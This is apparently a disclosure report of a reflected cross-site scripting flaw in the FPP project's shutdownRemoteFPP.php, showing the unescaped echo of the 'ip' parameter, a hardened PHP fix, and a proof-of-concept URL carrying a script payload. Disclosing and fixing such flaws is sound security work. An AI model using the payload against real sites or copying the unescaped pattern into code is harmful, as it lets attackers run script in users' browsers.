Cross-site Scripting (XSS) - Reflected in FalconChristmas/fpp

Valid
Reported on May 12th 2021

✍️ Description

In https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/shutdownRemoteFPP.php#L15 the value of the ip query parameter is echoed directly into the page without validation or output encoding:

$ip = $_GET['ip'];

echo "Shutting down FPP system @ $ip\n";
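The vulnerable pattern above next to one hardened form, as an added example written for this report rather than FPP's own code; the function names are assumed for the demo, and the inputs are constructed.

```php
<?php
// Added example, not FPP project code. Function names are assumptions.

// Vulnerable pattern from the report: the query value is interpolated into
// the HTML response unchanged, so any markup in ?ip= is rendered by the browser.
function render_vulnerable(string $ip): string
{
    return "Shutting down FPP system @ $ip\n";
}

// Hardened version: check that the value really is an IP literal, then
// HTML-encode it before output. Either step alone stops this payload;
// doing both gives defence in depth (validation also protects whatever
// later uses $ip as a host to connect to).
function render_hardened(string $ip): string
{
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        // Reject anything that is not a plain IPv4/IPv6 address.
        http_response_code(400);
        return "Invalid IP address\n";
    }
    $safe = htmlspecialchars($ip, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "Shutting down FPP system @ $safe\n";
}

// Constructed inputs: a benign address and the report's script payload.
$inputs = [
    '192.168.1.20',
    '<script>alert("zer0h");</script>',
];

foreach ($inputs as $ip) {
    echo "input:      " . $ip . "\n";
    echo "vulnerable: " . render_vulnerable($ip);
    echo "hardened:   " . render_hardened($ip) . "\n";
}
```

Run with `php example.php`: the vulnerable line returns the script tag verbatim, while the hardened line rejects it with a 400 and, for the valid address, returns the same text as before.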

🕵️‍♂️ Proof of Concept

Visit: http://127.0.0.1/shutdownRemoteFPP.php?ip=%3Cscript%3Ealert(%22zer0h%22);%3C/script%3E

💥 Impact

This vulnerability is a reflected cross-site scripting issue: the ip parameter is rendered as HTML, so script supplied in the URL executes in the browser of any user who opens the crafted link.